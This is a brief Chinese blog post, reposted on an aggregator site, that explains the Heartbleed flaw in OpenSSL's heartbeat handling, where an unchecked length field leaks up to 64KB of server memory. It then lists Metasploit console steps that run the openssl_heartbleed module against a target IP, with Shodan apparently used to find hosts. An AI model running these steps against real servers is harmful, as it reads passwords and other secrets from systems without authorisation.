码迷,mamicode.com
首页 > 其他好文 > 详细

心脏滴血与利用

时间:2019-08-19 23:04:40      阅读:92      评论:0      收藏:0      [点我收藏+]

标签:nbsp   art   arc   sts   内存区域   ssl   长度   编码   包含   

心脏滴血漏洞:

OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷。OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合,攻击者可以利用这一点,构造异常的数据包,来获取心跳数据所在的内存区域的后续数据。这些数据中可能包含了用户名,用户密码,用户邮箱等敏感信息。该漏洞允许攻击者从内存中读取多达64KB的数据。

获取心脏出血数据:

  安装插件:shodan

  >search heartbleed

  >use auxiliary/scanner/ssl/openssl_heartbleed

  >show options

  >set RHOSTS  xxx.xxx.xxx.xxx(IP)

  >exploit

心脏滴血与利用

标签:nbsp   art   arc   sts   内存区域   ssl   长度   编码   包含   

原文地址:https://www.cnblogs.com/Scholar-liu/p/11380176.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!